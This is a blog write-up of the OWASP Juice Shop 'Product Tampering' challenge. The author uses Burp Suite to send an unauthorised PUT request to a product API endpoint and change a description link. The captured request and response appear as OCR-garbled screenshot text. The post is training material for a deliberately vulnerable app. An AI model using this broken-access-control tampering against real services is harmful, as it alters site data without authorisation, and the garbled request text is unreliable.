Hacking OWASP’s Juice Shop Pt. 36: Product Tampering

Challenge: 

Name: Product Tampering

Description: Change the href of the link within the OWASP SSL Advanced Forensic Tool (O-Saft) product description into https://owasp.slack.com

Difficulty: 3 star

Category: Broken Access Control

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-access-control.html

Tools used:

Burp, FoxyProxy

Resources used:

Database Schema

Methodology: 

First, it’s important to read the expanded description in order to acquire the payload you’re supposed to be pushing to the product database.

<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-130.jpeg?w=763&quot; alt="Change the href of the link within the O-Saft product description The OWASP SSL Advanced Forensic Tool (O-Saft) product has a link in its description that leads to that projects wiki page. In this challenge you are supposed to change that link so that it will send you to http://kimminich.de instead. It is important to exactly follow the challenge instruction to make it light up green on the score board: Original link tag in the description:

Payload acquired, it’s time to find out more about the product which is to be modified.

Table: Products 
[41 entries] 
I id | 255 | 
name 
1 
3 
4 
5 
6 
7 
8 
10 
11 
12 
255 
255 
255 
255 
255 
255 
255 
255 
255 
255 
255 
255 
Apple Juice (løøøml) 
Orange Juice (løøøml) 
Eggfruit Juice (5øøml) 
Raspberry Juice (løøøml) 
Lemon Juice (5øøml) 
Banana Juice (løøøml) 
OWASP Juice Shop T-Shirt 
OWASP Juice Shop CIF Girlie-shirt 
OWASP SSL Advanced Forensic Tool (O-saft) 
Christmas Super-surprise-Box (2014 Edition) 
Rippertuer Special Juice 
OWASP Juice Shop sticker (2015/2016 design) 
image 
apple_juice.jpg 
orange_juice. jpg 
eggfruit_juice. jpg 
raspberry_juice. jpg 
lemon_juice. jpg 
banana_juice.jpg 
fan _ shirt . jpg 
fan_girlie. jpg 
orange_juice . jpg 
undefined. jpg 
undefined . jpg 
sticker. png 
I price 
1.99 
2 .99 
8.99 
4.99 
2.99 
1.99 
22 .49 
22.49 
0.01 
29.99 
16.99 
999.99

After making note of product ID number, I fired up Burp Suite and set up FoxyProxy to start tinkering with packets. I knew, thanks to the expanded description, that this challenge would require direct modification of the database via the API. That pointed me in the direction of crafting a packet to use the PUT command, to send to that product’s URL. Thanks to all of the database information I collected in the Database Schema challenge, I even knew which field to update and how to accomplish that.

Request 
Params 
Pretty 
Raw -An 
Headers 
Actions 
"SON web Tokens 
PUT /api/Products/9 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
Authorization: Bearer eyJoeXAioiJKVIQiLCJhbGcioiJsuz11NiJ9. eyJzdGF0dXMioiJzd'ANj ZXNz1iwiZGFOY 
ype: application/ j son 
8 Content-T 
Origin: http 
// I Ocal host 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
12 Cookle: language=en; 
IS Content -Length: 
ISO{ 
description 
welcomebanner status=dismiss, 
href=\ 
"https://owasp . slack.com\ 
cookieconsent 
status=dismiss, 
continueCod 
target= 
bl ank\ " >More

After sending that packet off, this was the response:

Response 
Pretty 
Headers 
Render 
Raw 
200 0K 
_Actions 
Access-Cont rol -Allow-origin: 1 
S X-Content -Type-options: nosniff 
SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: application/ j son; charset=utf- 
7 Content -Length: 
a-rag: W,' 13f-yshi4Rv1F6GbDS+0Ü,NqVt9DrsJM' 
Vary: Accept -Encoding 
10 Date: Thu, OS Nov 2020 GI•TT 
Il Connection: 
status 
'data" 
'name 
cl ose 
success , 
' O,NASP ssL 
'description 
price" : 0.01, 
'deluxeprice" : 0.01, 
" Image 
'orange ] ulce.]pg", 
Advanced Forensic Tool (O-Saft) 
href=\ 
"http://kimminich.de\ 
target= 
blank \ 
*ore. 
createdAt " 
'updatedAt " 
'deletedAt' 
2020-11-OST17: 21 912Z" , 
'2020-11-OST19: 45: 13. 817?' , 
:null
You successfully solved a challenge: Product Tampering (Change the href of the link within the 
OWASP SSL Advanced Forensic Tool (O-Saft) product description into https://owasp.slack.com.) 
x

Prevention and Mitigation Strategies:

OWASP REST Security Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

PUT commands are something I’ve only used a couple of times before, so I could certainly use more practice with it. Fortunately what I already knew was sufficient for this challenge.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s